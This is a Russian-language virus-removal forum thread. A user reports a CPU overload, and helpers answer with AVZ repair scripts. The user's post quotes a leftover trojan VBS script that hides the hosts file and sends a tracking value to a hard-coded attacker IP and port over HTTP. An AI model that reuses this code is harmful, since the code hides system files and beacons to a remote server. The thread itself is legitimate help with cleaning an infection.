Загрузка ЦП

Printable View

08.10.2012, 01:08
efremovxp

Вложений: 2

Загрузка ЦП

Компьютер ужасно висит, не открываются половина сайтов.

ЦП загружен на 90-100% постоянно.
Подозреваю что причина в cmd.exe и svchost.exe (большая загрузка ЦП). При завершении процесса cmd.exe загрузка ЦП становится 10-20%.

Eset Smart Security нашел и удалил файл троян lomay_manya.bat в директории C:\Program Files\j1\j1
От трояна остались файлы ko.txt и test.vbs
Содержимое test.vbs

[CODE]Set oFSO = CreateObject ("Scripting.FileSystemObject")
sWinDir = oFSO.GetSpecialFolder (0)
'WScript.Echo sWinDir
set fso = CreateObject("Scripting.FileSystemObject")
set ts = fso.OpenTextFile(sWinDir+"\System32\drivers\etc\hоsts", 8, true, -2)
'ts.WriteLine "Инфа"
ts.CLOSE
'Скрываем файл
set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.GetFile(sWinDir+"\System32\drivers\etc\hosts")
file.Attributes = 2

Const strFilePath = "ko.txt"
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
Dim fso, objFile, objNewFile, s

Set fso = CreateObject("Scripting.FileSystemObject")
'открываем файл для чтения
Set objFile = fso.OpenTextFile(strFilePath,1)
s=objFile.ReadLine

Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://94.249.190."+"123:45612/stat/tuk/"+s, False
o.send[/CODE]

Содержимое ko.txt
[CODE]169[/CODE]

[ATTACH]380232[/ATTACH]
[ATTACH]380233[/ATTACH]
08.10.2012, 01:10
Info_bot

Уважаемый(ая) [B]efremovxp[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в [URL="http://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
08.10.2012, 01:28
regist

Выполните скрипт

[CODE]begin
SetAVZPMStatus(false);
RebootWindows(false);
end.[/CODE]
компьютер перезагрузится после этого сделайте логи заново. Самостоятельно настройки AVZ не меняйте ! >:(

[COLOR="silver"]- - - Добавлено - - -[/COLOR]

зы. не надо архивировать всю папку с логами, прикрепите только то что просят !
08.10.2012, 02:08
efremovxp

Вложений: 3

[ATTACH]380234[/ATTACH]
[ATTACH]380235[/ATTACH]
[ATTACH]380236[/ATTACH]
08.10.2012, 11:34
Techno

- [URL="http://virusinfo.info/showthread.php?t=7239"]Выполните в АВЗ:[/URL]
[CODE]begin
ExecuteRepair(10);
end.[/CODE]

- [URL="http://virusinfo.info/showthread.php?t=53070"][B]Сделайте лог полного сканирования MBAM[/B][/URL].